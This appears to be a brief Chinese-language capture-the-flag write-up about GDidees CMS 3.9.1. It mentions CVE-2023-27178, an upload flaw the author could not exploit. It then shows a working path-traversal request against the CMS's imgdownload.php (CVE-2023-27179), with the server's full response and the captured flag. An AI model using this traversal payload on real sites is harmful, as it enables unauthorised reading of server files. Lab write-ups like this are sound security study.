CVE-2023-27178

信息

Tags

• GDidees CMS

官方数据库记录

GDidees CMS 3.9.1 上传功能中存在任意文件上传漏洞，允许攻击者通过精心设计的文件执行任意代码。

按照网上资料，漏洞存在于 /_admin/ckeditor/plugins/ckfinder/ 路由的文件上传功能，但是无法绕过

可以尝试直接进行CVE-2023-27179的攻击：任意文件读取

root@jmt-projekt:~# http "http://eci-2ze4pnf4or9co59ohuov.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag"
HTTP/1.1 200 OK
Cache-Control: must-revalidate, post-check=0, pre-check=0, public
Connection: keep-alive
Content-Disposition: attachment; filename="flag.png"
Content-Length: 42
Content-Transfer-Encoding: $type\n
Content-Type: application/force-download
Date: Tue, 23 Jul 2024 15:44:22 GMT
Expires: 0
Pragma: no-cache
X-Powered-By: PHP/7.3.33

flag{a911e14f-699c-4bc3-96a8-87b5e6d36608}